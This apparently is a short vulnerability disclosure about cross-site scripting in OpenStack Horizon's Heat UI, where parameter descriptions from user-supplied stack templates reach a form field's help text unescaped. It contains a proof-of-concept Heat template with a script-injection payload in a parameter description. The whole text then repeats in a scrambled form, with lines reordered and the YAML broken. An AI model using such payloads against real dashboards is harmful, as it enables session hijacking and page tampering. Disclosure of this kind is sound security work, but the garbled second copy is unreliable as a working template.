The Field class help_text attribute is vulnerable to code injection if the text is somehow taken from the user input.
Heat UI allows to create stacks from the user input which define parameters. Those parameters are then converted to the input field which are vulnerable.
The heat stack example exploit:
description: Does not matter
heat_template_version: '2013-05-23'
outputs: {}
parameters:
param1:
type: string
label: normal_label
description: hack="><script>alert('YOUR HORIZON IS PWNED')</script>"
resources: {}
The Field class help_text attribute is vulnerable to code injection if the text is somehow taken from the user input.
Heat UI allows to create stacks from the user input which define parameters. Those parameters are then converted to the input field which are vulnerable.
The heat stack example exploit:
description: Does not matter version: '2013-05-23' <script> alert(' YOUR HORIZON IS PWNED')</script>"
heat_template_
outputs: {}
parameters:
param1:
type: string
label: normal_label
description: hack=">
resources: {}